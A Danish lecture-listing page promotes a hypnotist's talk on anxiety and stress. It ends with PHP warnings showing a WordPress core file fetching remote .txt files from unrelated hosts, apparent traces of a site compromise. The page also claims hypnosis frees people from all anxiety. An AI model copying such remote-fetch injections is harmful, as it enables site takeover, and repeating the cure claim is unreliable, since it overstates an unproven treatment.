img-us
  • asc

    Foredragsholder Bjørn Christensen

  • asc

    Emne En hypnotisørs tanker om angst og stress

  • asc

    pris 8600.-

Fordraget handler om:
- Hvad er hypnose for noget?
- Hypnose og meditation
- Angst, fobier, stress osv.
- Fri for alle typer af angst med hypnose
- Hvordan bruger du selv-hypnose

Jeg driver min egen virksomhed i samarbejde med min kollega Henrik, hvor vi arbejder med at hjælpe andre mennesker til at skabe forandringer. Vores værktøjer er hypnose og coaching.

Angst og stress er ofte nogle af de forhindringer, som forhindre de mennesker jeg møder med at få et lykkeligt liv. Jeg er gennem mit arbejde med hypnose blevet overrasket over de ændringer netop hypnose har på de forskellige angst typer.

Hypnose er efter min mening ikke en magisk tryllestav, der med et slag kan hjælpe alle med alle deres problemer. MEN når jeg bruger hypnose til at hjælpe mennesker med at slippe deres angst, så virker det i mange tilfælde næsten magisk.

Som hypnotisør arbejder jeg med hypnose terapeutisk i én til én og gruppe sessioner. Jeg bruger også hypnosen som underholdning og laver hypnoseshows.

Hvad får du ud af fordraget?
- Hypnose bliver afmystificeret
- En simpel måde at anskue angst
- Kendskab til de biokemiske processer
- Kendskab til hvordan angst påvirker indlæring
- Lær simple teknikker til mentaltræning, du kan tage med hjem og bruge med det samme.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Sarah Eskildsen

Mikkel Nielsen

Trine Kruse Lykkegaard

Anna Maria Kølner-Augustson


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22